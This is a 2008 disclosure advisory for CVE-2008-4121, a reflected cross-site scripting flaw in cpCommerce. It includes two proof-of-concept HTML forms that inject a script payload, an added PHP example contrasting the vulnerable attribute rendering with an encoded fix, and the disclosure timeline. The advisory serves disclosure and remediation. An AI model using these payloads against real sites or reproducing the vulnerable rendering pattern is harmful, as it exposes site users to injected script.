Cross Site Scripting (XSS) Vulnerability in cpCommerce, CVE-2008-4121

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
http://cpcommerce.cpradio.org/

Description

cpCommerce is an open-source e-commerce solution that is built and extended through templates and modules.

Example

Assuming cpCommerce is installed at http://localhost/cpcommerce/, anybody can inject JavaScript through the search parameter of search.php and the name parameter of sendtofriend.php, as the following two forms demonstrate:

<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type="submit"></form>

<form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
<input type="hidden" name="action" value="sendtofriend">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type="submit"></form>
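The following PHP is an added illustration, not code from cpCommerce or from the advisory's author. It assumes the pattern that produces this class of reflected XSS: a request parameter (search or name) is written back into an HTML attribute without encoding. The function names, the markup and the file name are hypothetical; the payload is the one quoted above. The vulnerable rendering is shown beside the hardened form that encodes for the attribute context at the point of output.

```php
<?php
// Added example, not cpCommerce's own code. Assumes a reflected-parameter
// pattern: the value of the "search" (or "name") request parameter is
// echoed back into a double-quoted HTML attribute. Names are hypothetical.

declare(strict_types=1);

// The payload quoted in the advisory, used here as constructed test input.
const ADVISORY_PAYLOAD = '"><script>alert(1)</script>';

// Vulnerable pattern: raw interpolation into a double-quoted attribute.
// The leading " closes the attribute, > closes the tag, and the browser
// then executes the injected <script> element.
function render_search_form_vulnerable(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">';
}

// Hardened pattern: encode for the HTML attribute context before output.
// ENT_QUOTES encodes both " and ', so the attribute cannot be closed early;
// the explicit charset stops the encoder from mis-parsing multibyte input.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_search_form_safe(string $search): string
{
    return '<input type="text" name="search" value="' . html_attr($search) . '">';
}

// The same treatment applies to sendtofriend.php's "name" parameter.
function render_name_field_safe(string $name): string
{
    return '<input type="text" name="name" value="' . html_attr($name) . '">';
}

// Returns true when the rendered fragment contains no raw tag opener and
// the attribute we wrote has not been closed early by the input.
function fragment_is_encoded(string $html): bool
{
    return !str_contains($html, '<script') && !str_contains($html, '"><');
}

// Run from the command line: php xss_fix_example.php
$vulnerable = render_search_form_vulnerable(ADVISORY_PAYLOAD);
$safe       = render_search_form_safe(ADVISORY_PAYLOAD);
$safeName   = render_name_field_safe(ADVISORY_PAYLOAD);

echo "vulnerable: $vulnerable\n";
echo "safe:       $safe\n";

if (fragment_is_encoded($vulnerable)) {
    fwrite(STDERR, "unexpected: vulnerable rendering did not reflect the payload\n");
    exit(1);
}
if (!fragment_is_encoded($safe) || !fragment_is_encoded($safeName)) {
    fwrite(STDERR, "encoding check failed\n");
    exit(1);
}
echo "encoding check passed\n";
```

The fix is output encoding at the render site, not input filtering: the search term is stored and processed unchanged, and only its representation in the HTML attribute is escaped. A value that is later written into a different context (JavaScript, a URL, CSS) needs the encoder for that context; htmlspecialchars alone is only correct for HTML body text and quoted attributes.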

Disclosure Timeline

2008-09-23 Vendor contacted
2008-09-23 Vendor released 1.2.4
2008-10-19 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4121 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck).
It is licensed under the Creative Commons Attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de